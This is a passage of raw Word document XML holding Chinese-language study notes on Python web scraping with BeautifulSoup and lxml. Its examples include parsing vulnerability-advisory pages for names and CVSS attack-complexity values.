    <w:p w14:paraId="6850E3C8" w14:textId="77777777" w:rsidR="001957E4" w:rsidRDefault="000E5A28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>另一种匹配方式</w:t>
      </w:r>
      <w:r w:rsidR="00BF5236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，如要匹配</w:t>
      </w:r>
      <w:r w:rsidR="00BF5236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidR="00BF5236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标签，然后还有其属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6435C1" w14:textId="6F6A9E89" w:rsidR="000E5A28" w:rsidRDefault="003C2331" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003C2331">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tds = soup.find_all('td', {'nowrap': 'nowrap'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE17B51" w14:textId="77777777" w:rsidR="00D57090" w:rsidRDefault="00D57090" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E9517E" w14:textId="77777777" w:rsidR="007A58D5" w:rsidRDefault="007A58D5" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A25225" w14:textId="774095E5" w:rsidR="00D57090" w:rsidRPr="00FD5938" w:rsidRDefault="00D57090" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r w:rsidR="00FD5938" w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取类似</w:t>
      </w:r>
      <w:r w:rsidR="00FD5938" w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;a href="/detail?id=AVD-2023-31609" target="_blank"&gt;Link Text&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FD5938" w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="00FD5938" w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:r w:rsidR="00FD5938" w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927B413" w14:textId="77777777" w:rsidR="00FD5938" w:rsidRPr="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>soup = BeautifulSoup(html, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73341444" w14:textId="77777777" w:rsidR="00FD5938" w:rsidRPr="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a_tag = soup.find('a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA6CF7" w14:textId="77777777" w:rsidR="00FD5938" w:rsidRPr="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353307BD" w14:textId="77777777" w:rsidR="00FD5938" w:rsidRPr="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用字典访问语法获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'href' </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>属性的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78650856" w14:textId="01BCA67F" w:rsidR="00FD5938" w:rsidRPr="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href_value = a_tag['href']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B40DAD" w14:textId="350AD06E" w:rsidR="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="840"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href_value = a_tag.get('href')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EA69D" w14:textId="77777777" w:rsidR="00D57090" w:rsidRDefault="00D57090" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C49D52" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        div = divs[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D43B9D" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        re_pattern_vul_name = r'''(.*?)Affecting'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FFD44B" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        re_exp = re.compile(re_pattern_vul_name, re.DOTALL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66802E6A" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        vul_name = re_exp.search(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC45CB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>div.getText()</w:t>
      </w:r>
      <w:r>
        <w:t>)[1].strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E818B5F" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        data_extract_data['vul_name'] = vul_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACCA6D0" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E030B2" w14:textId="0828313D" w:rsidR="007E6558" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        log_debug.error("vul_name " + str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A8E2AF" w14:textId="610D4BD5" w:rsidR="007E6558" w:rsidRDefault="007E6558" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562318AC" w14:textId="3B712207" w:rsidR="007E6558" w:rsidRDefault="00CC45CB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="_Toc159780046"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择器</w:t>
      </w:r>
      <w:r w:rsidR="00325E20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E1451E">
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidR="00325E20">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
    </w:p>
    <w:p w14:paraId="284F20FF" w14:textId="781CE8B3" w:rsidR="007E6558" w:rsidRDefault="00953FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>soup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.select() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>soup.select_one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种用法，</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC" w:rsidRPr="00CC1EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>前者</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回找到的符合选择器的</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC" w:rsidRPr="00CC1EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC" w:rsidRPr="00CC1EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后者</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC" w:rsidRPr="00CC1EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列表中的第一个</w:t>
      </w:r>
      <w:r w:rsidR="00A607DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC84A4" w14:textId="77777777" w:rsidR="00953FCB" w:rsidRDefault="00953FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6139BB93" w14:textId="1D415EE0" w:rsidR="000636EB" w:rsidRPr="000636EB" w:rsidRDefault="000636EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000636EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="000636EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="000636EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法，而是</w:t>
      </w:r>
      <w:r w:rsidRPr="000636EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="000636EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3A715" w14:textId="77777777" w:rsidR="000636EB" w:rsidRDefault="000636EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E18C471" w14:textId="77777777" w:rsidR="00953FCB" w:rsidRDefault="00953FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">div = </w:t>
      </w:r>
      <w:r w:rsidRPr="00377477">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>soup.select_one</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00377477">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"#__layout &gt; div &gt; main &gt; div &gt; div.vue--layout-container.vuln-page__body-wrapper.grid-wrapper &gt; div.right.details-boxes &gt; div.cvss-details &gt; div &gt; div &gt; div &gt; ul &gt; div:nth-child(2) &gt; span:nth-child(2) &gt; strong"</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734D6AD" w14:textId="77777777" w:rsidR="00953FCB" w:rsidRDefault="00953FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        attack_complexity = div.getText()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14591DDF" w14:textId="011C8A76" w:rsidR="00CC45CB" w:rsidRDefault="00953FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B956DFF" w14:textId="6EA99A7D" w:rsidR="00CC45CB" w:rsidRDefault="00CC45CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F117F7E" w14:textId="486FDEDB" w:rsidR="006C64D0" w:rsidRDefault="006C64D0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="614" w:name="_Toc159780047"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选取页面内容：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lxml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="614"/>
    </w:p>
    <w:p w14:paraId="36A8DB5D" w14:textId="77777777" w:rsidR="006C64D0" w:rsidRPr="006C64D0" w:rsidRDefault="006C64D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF4BC3F" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，用于解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档。它常常用于网页抓取，但它本身并不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用自己的语法来选取文档中的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6AF61" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE2E4B2" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可能需要使用其他的库，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。以下是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062EFAF4" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535E1EEB" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from lxml import etree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD50F60" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BBAA8B" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>html = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A7A13" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A142E" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364E40E" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div id="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108DC189" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p class="text"&gt;Hello, world!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946588C" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABFBA0B" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785100E6" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C6DA4" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27109B" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
